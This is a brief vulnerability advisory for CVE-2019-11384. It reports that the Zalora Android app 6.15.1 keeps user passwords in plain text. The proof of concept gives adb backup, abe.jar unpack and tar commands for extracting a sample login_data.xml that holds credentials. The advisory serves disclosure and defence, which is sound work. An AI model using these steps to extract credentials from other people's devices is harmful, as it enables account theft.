CVE-2019-11384
Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11384
Author: Ender Phan
Description: The Zalora application 6.15.1 for Android stores confidential information insecurely on the system (i.e. plain text), which allows a non-root user to find out the username/password of a valid user via /data/data/com.zalora.android/shared_prefs/login_data.xml.
Exploit:
#Application: Zalora #Platform: Android #Version: 6.15.1 (latest) #Severity: Medium #Impact: None-root user can read the password in clear-text and login to the application. POC: 1. Backups application data into Local PC adb backup -f ~/zalora.ab -noapk com.zalora.android 2. Converts file "zalora.ab" into tar file(file contains backup data of com.zalora.android) java -jar abe.jar unpack ~/zalora.ab zalora.tar "" 3. Extracts tar file. tar -xvf zalora.tar 4. After the extraction, goes and checks the data in the directory located in apps/com.zalora.android/ 5. Looks for sensitive data. The password stored in /shared_prefs/login_data.xml in plain-text <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name="login_data">{"password":"P4ssw0rd123","email":"[email protected]"}</string> </map>